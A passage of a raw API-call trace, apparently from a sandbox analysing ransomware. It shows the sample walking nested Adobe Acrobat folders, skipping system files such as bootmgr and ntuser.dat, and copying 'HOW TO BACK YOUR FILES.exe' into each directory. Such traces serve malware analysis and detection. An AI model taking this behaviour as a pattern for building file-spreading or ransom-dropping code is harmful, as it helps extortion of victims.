Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.561] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.561] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.561] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.561] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.562] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="aoldtz.exe") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="bootmgr") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="temp") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="pagefile.sys") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="boot") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="ids.txt") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0091.562] lstrcmpiW (lpString1="10.0", lpString2="MSBuild") returned -1 [0091.562] lstrlenW (lpString="10.0") returned 4 [0091.562] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*") returned 170 [0091.562] lstrcpyW (in: lpString1=0x2cce552, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0091.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0091.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15c) returned 0x31efc8 [0091.562] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0091.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.562] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0091.562] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.562] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0091.562] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0091.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.562] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 173 [0091.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.563] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.563] GetLastError () returned 0x0 [0091.563] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.563] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.563] CloseHandle (hObject=0x120) returned 1 [0091.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.564] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.564] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.564] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.564] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.564] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.564] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.564] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.564] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="aoldtz.exe") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2=".") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="..") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="windows") returned -1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="bootmgr") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="temp") returned -1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="pagefile.sys") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="boot") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="ids.txt") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="ntuser.dat") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="perflogs") returned 1 [0091.564] lstrcmpiW (lpString1="Replicate", lpString2="MSBuild") returned 1 [0091.564] lstrlenW (lpString="Replicate") returned 9 [0091.565] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*") returned 175 [0091.565] lstrcpyW (in: lpString1=0x2cce55c, lpString2="Replicate" | out: lpString1="Replicate") returned="Replicate" [0091.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0091.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x170) returned 0x332fc8 [0091.565] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0091.565] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Replicate", cAlternateFileName="REPLIC~1")) returned 0 [0091.565] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.565] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0091.565] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0091.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.565] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 183 [0091.565] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.565] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.565] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.566] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.566] GetLastError () returned 0x0 [0091.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.566] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.566] CloseHandle (hObject=0x120) returned 1 [0091.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.566] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.566] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.566] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.566] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.566] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0091.566] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.566] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.566] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0091.566] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0091.567] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0091.567] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cfe13c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0091.567] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0091.567] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="aoldtz.exe") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2=".") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="..") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="windows") returned -1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="bootmgr") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="temp") returned -1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="pagefile.sys") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="boot") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="ids.txt") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="ntuser.dat") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="perflogs") returned 1 [0091.567] lstrcmpiW (lpString1="Security", lpString2="MSBuild") returned 1 [0091.567] lstrlenW (lpString="Security") returned 8 [0091.567] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 185 [0091.567] lstrcpyW (in: lpString1=0x2cce570, lpString2="Security" | out: lpString1="Security") returned="Security" [0091.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b48 [0091.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x182) returned 0x31cfc8 [0091.567] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b50 | out: ListHead=0x2e7710, ListEntry=0x2e7b50) returned 0x2e7b10 [0091.567] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Security", cAlternateFileName="")) returned 0 [0091.567] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.567] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0091.567] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31cfc8 | out: hHeap=0x2b0000) returned 1 [0091.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0091.567] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 192 [0091.567] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.567] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.568] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.568] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.568] GetLastError () returned 0x0 [0091.568] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.568] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.568] CloseHandle (hObject=0x120) returned 1 [0091.568] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.568] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.569] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.569] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR 